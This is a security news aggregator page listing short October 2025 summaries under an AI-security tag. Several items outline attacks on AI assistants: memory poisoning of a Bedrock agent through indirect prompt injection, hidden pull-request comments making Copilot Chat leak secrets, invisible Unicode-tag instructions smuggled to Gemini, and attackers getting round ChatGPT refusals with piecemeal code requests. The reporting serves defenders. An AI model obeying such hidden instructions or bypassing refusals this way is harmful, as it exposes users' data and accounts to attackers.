Tag Banner

All news with #ai security tag

Thu, October 9, 2025

Indirect Prompt Injection Poisons Agents' Long-Term Memory

⚠️This Unit 42 proof-of-concept shows how an attacker can use indirect prompt injection to silently poison an AI agent’s long-term memory, demonstrated against a travel assistant built on Amazon Bedrock. The attack manipulates the agent’s session summarization process so malicious instructions become stored memory and persist across sessions. When the compromised memory is later injected into orchestration prompts, the agent can be coerced into unauthorized actions such as stealthy exfiltration. Unit 42 outlines layered mitigations including pre-processing prompts, Bedrock Guardrails, content filtering, URL allowlisting, and logging to reduce risk.

read more →

Thu, October 9, 2025

From HealthKick to GOVERSHELL: UTA0388's Malware Evolution

🔎 Volexity attributes a series of tailored spear‑phishing campaigns to a China‑aligned actor tracked as UTA0388, which delivers a Go-based implant named GOVERSHELL. The waves used multilingual, persona-driven lures and legitimate cloud hosting (Netlify, Sync, OneDrive) to stage ZIP/RAR archives that deploy DLL side‑loading and a persistent backdoor. As many as five GOVERSHELL variants emerged between April and September 2025, succeeding an earlier C++ family called HealthKick. Volexity also observed the actor abusing LLMs such as ChatGPT to craft phishing content and automate workflows.

read more →

Thu, October 9, 2025

Securing Agentic AI: Microsoft Ignite Security Guide

🔒 Microsoft Ignite 2025 highlights security-focused sessions and hands-on labs tailored for practitioners and leaders. Join in San Francisco Nov 17–21 (or online Nov 18–20) for briefings, demos, and instructor-led labs covering Microsoft Security Copilot, Sentinel, Defender, Entra, and Purview. A Security Forum (Nov 17) and keynote segments led by senior security executives will explore designing, governing, and protecting agentic AI across the lifecycle.

read more →

Thu, October 9, 2025

Closing the Cloud Security Gap: Key Findings 2025 Report

🔒 The 2025 Unit 42 Global Incident Response Report shows that nearly a third of incidents investigated in 2024 were cloud-related, with 21% of cases directly impacting cloud assets. The article stresses the importance of the shared responsibility model and full, dynamic visibility to manage resource sprawl, misconfigurations and complex cloud-native architectures. It highlights identity misuse and overpermissioned accounts as frequent attack vectors and urges least privilege, credential rotation and robust logging. Palo Alto Networks recommends unified posture and response through Cortex Cloud and integration with Cortex XSIAM to reduce noise and automate remediation.

read more →

Thu, October 9, 2025

Microsoft Expands Azure Datacenters and AI in Asia

☁️ Microsoft is expanding its Azure footprint across Asia, launching new datacenter regions in Malaysia and Indonesia in 2025 and announcing planned expansions in India and Taiwan for 2026. The company is investing billions to deliver AI-ready hyperscale infrastructure, next‑generation networking, scalable storage, and multi‑zone availability to support low-latency, compliant services. Microsoft also plans a second Malaysia region (Southeast Asia 3) and recommends multi-region architectures along with the Cloud Adoption and Well‑Architected Frameworks to improve resilience, performance, and cost optimization.

read more →

Thu, October 9, 2025

Researchers Identify Architectural Flaws in AI Browsers

🔒 A new SquareX Labs report warns that integrating AI assistants into browsers—exemplified by Perplexity’s Comet—introduces architectural security gaps that can enable phishing, prompt injection, malicious downloads and misuse of trusted apps. The researchers flag risks from autonomous agent behavior and limited visibility in SASE and EDR tools. They recommend agentic identity, in-browser DLP, client-side file scanning and extension risk assessments, and urge collaboration among browser vendors, enterprises and security vendors to build protections into these platforms.

read more →

Thu, October 9, 2025

September 2025 Cyber Threats: Ransomware and GenAI Rise

🔍 In September 2025, global cyber-attack volumes eased modestly, with organizations facing an average of 1,900 attacks per organization per week — a 4% decline from August but a 1% increase year-over-year. Beneath this apparent stabilization, ransomware activity jumped sharply (up 46%), while emerging GenAI-related data risks expanded rapidly, changing attacker tactics. The report warns that evolving techniques and heightened data exposure are creating a more complex and consequential threat environment for organizations worldwide.

read more →

Thu, October 9, 2025

ThreatsDay: Teams Abuse, MFA Hijack, $2B Crypto Heist

🛡️ Microsoft and researchers report threat actors abusing Microsoft Teams for extortion, social engineering, and financial theft after hijacking MFA with social engineering resets. Separate campaigns use malicious .LNK files to deliver PowerShell droppers and DLL implants that establish persistent command-and-control. Analysts also link over $2 billion in 2025 crypto thefts to North Korean‑linked groups and identify AI-driven disinformation, IoT flaws, and cloud misconfigurations as multiplying risk. Defenders are urged to harden identity, secure endpoints and apps, patch exposed services, and limit long-lived cloud credentials.

read more →

Thu, October 9, 2025

UK Upper Tribunal Upholds ICO Claim Against Clearview

🔍 The UK Information Commissioner’s Office (ICO) won an Upper Tribunal ruling that bolsters its authority to enforce the UK GDPR against Clearview AI and increases the likelihood of a previously issued £7.5m penalty being upheld. The tribunal found that Clearview’s scraping and global database usage involved monitoring the behavior of UK residents and is not beyond the reach of UK law even when services are provided to foreign law‑enforcement customers. The UT has directed the First‑Tier Tribunal to reconsider its earlier decision in light of this jurisdictional clarity, though Clearview may still appeal.

read more →

Thu, October 9, 2025

AI-Powered Cyberattacks Escalate Against Ukraine in 2025

🔍 Ukraine's SSSCIP reported a sharp rise in AI-enabled cyber operations in H1 2025, documenting 3,018 incidents versus 2,575 in H2 2024. Analysts found evidence that attackers used AI not only to craft phishing lures but also to generate malware samples, including a PowerShell stealer identified as WRECKSTEEL. Multiple UAC clusters—such as UAC-0219, UAC-0218, and UAC-0226—deployed stealers and backdoors via booby-trapped archives, SVG attachments, and ClickFix-style tactics. The report also details zero-click exploitation of Roundcube and Zimbra flaws and widespread abuse of legitimate cloud and collaboration services for hosting and data exfiltration.

read more →

Thu, October 9, 2025

CISOs Seek Greater Data Visibility Across Hybrid Clouds

🔍 A majority of CISOs want full visibility into data flows across hybrid cloud environments but often lack suitable tooling. The Gigamon study CISO Insights: Recalibrating Risk in the Age of AI, surveying 1,021 security and IT leaders including 200 CISOs in early 2025, reports that network data volumes have nearly doubled due to AI and that 86% favor combining packet and metadata. However, 97% admit they must compromise on transparency, and many distrust public cloud security.

read more →

Wed, October 8, 2025

GitHub Copilot Chat prompt injection exposed secrets

🔐 GitHub Copilot Chat was tricked into leaking secrets from private repositories through hidden comments in pull requests, researchers found. Legit Security researcher Omer Mayraz reported a combined CSP bypass and remote prompt injection that used image rendering to exfiltrate AWS keys. GitHub mitigated the issue in August by disabling image rendering in Copilot Chat, but the case underscores risks when AI assistants access external tools and repository content.

read more →

Wed, October 8, 2025

Security firm urges disconnecting Gemini from Workspace

⚠️FireTail warns that Google Gemini can be tricked by hidden ASCII control characters — a technique the firm calls ASCII Smuggling — allowing covert prompts to reach the model while remaining invisible in the UI. The researchers say the flaw is especially dangerous when Gemini is given automatic access to Gmail and Google Calendar, because hidden instructions can alter appointments or instruct the agent to harvest sensitive inbox data. FireTail recommends disabling automatic email and calendar processing, constraining LLM actions, and monitoring responses while integrations are reviewed.

read more →

Wed, October 8, 2025

AI-Powered Cloud Alert Investigation with FortiCNAPP

🔎 FortiCNAPP consolidates related cloud signals into composite alerts, reducing noise and prioritizing high-confidence incidents so SOC teams can focus on what matters. Its Observation Timeline sequences logins, API calls, commands, and network traffic into a single, evidence-backed storyline. An AI Alert Assistant supports natural-language queries and returns structured answers, visual relationships, and prioritized remediation steps to accelerate containment and help junior analysts act confidently.

read more →

Wed, October 8, 2025

Salesforce launches AI security and compliance agents

🔒 Salesforce introduced two AI agents on its Agentforce platform that monitor security activity and streamline compliance workflows for the Security Center and Privacy Center. The security agent analyzes event logs to detect anomalous behavior, accelerates investigations by assembling context and remediation plans, and can autonomously freeze or isolate suspicious accounts when authorized. The privacy agent maps metadata and policies against frameworks like GDPR and CCPA, surfaces exposures, and can reclassify or apply erasure policies to reduce compliance risk.

read more →

Wed, October 8, 2025

OpenAI Disrupts Malware Abuse by Russian, DPRK, China

🛡️ OpenAI said it disrupted three clusters that misused ChatGPT to assist malware development, including Russian-language actors refining a RAT and credential stealer, North Korean operators tied to Xeno RAT campaigns, and Chinese-linked accounts targeting semiconductor firms. The company also blocked accounts used for scams, influence operations, and surveillance assistance and said actors worked around direct refusals by composing building-block code. OpenAI emphasized that models often declined explicit malicious prompts and that many outputs were not inherently harmful on their own.

read more →

Wed, October 8, 2025

Autonomous AI Hacking: How Agents Will Reshape Cybersecurity

⚠️ AI agents are increasingly automating cyberattacks, performing reconnaissance, exploitation, and data theft at machine speed and scale. In 2023 examples include XBOW's mass vulnerability reports, DARPA teams finding dozens of flaws in hours, and reports of adversaries using Claude and HexStrike-AI to orchestrate ransomware and persistent intrusions. This shift threatens accelerated attacks beyond traditional patch cycles while presenting new defensive opportunities such as AI-assisted vulnerability discovery, VulnOps, and even self-healing networks.

read more →

Tue, October 7, 2025

Google won’t fix new ASCII smuggling attack in Gemini

⚠️ Google has declined to patch a new ASCII smuggling vulnerability in Gemini, a technique that embeds invisible Unicode Tags characters to hide instructions from users while still being processed by LLMs. Researcher Viktor Markopoulos of FireTail demonstrated hidden payloads delivered via Calendar invites, emails, and web content that can alter model behavior, spoof identities, or extract sensitive data. Google said the issue is primarily social engineering rather than a security bug.

read more →

Tue, October 7, 2025

Google DeepMind's CodeMender Automatically Patches Code

🛠️ Google’s DeepMind unveiled CodeMender, an AI agent that automatically detects, patches, and rewrites vulnerable code to remediate existing flaws and prevent future classes of vulnerabilities. Backed by Gemini Deep Think models and an LLM-based critique tool, it validates changes to reduce regressions and self-correct as needed. DeepMind says it has upstreamed 72 fixes to open-source projects so far and will engage maintainers for feedback to improve adoption and trust.

read more →

Tue, October 7, 2025

AI-Powered Breach and Attack Simulation for Validation

🔍 AI-powered Breach and Attack Simulation (BAS) converts the flood of threat intelligence into safe, repeatable tests that validate defenses across real environments. The article argues that integrating AI with BAS lets teams operationalize new reports in hours instead of weeks, delivering on-demand validation, clearer risk prioritization, measurable ROI, and board-ready assurance. Picus Security positions this approach as a practical step-change for security validation.

read more →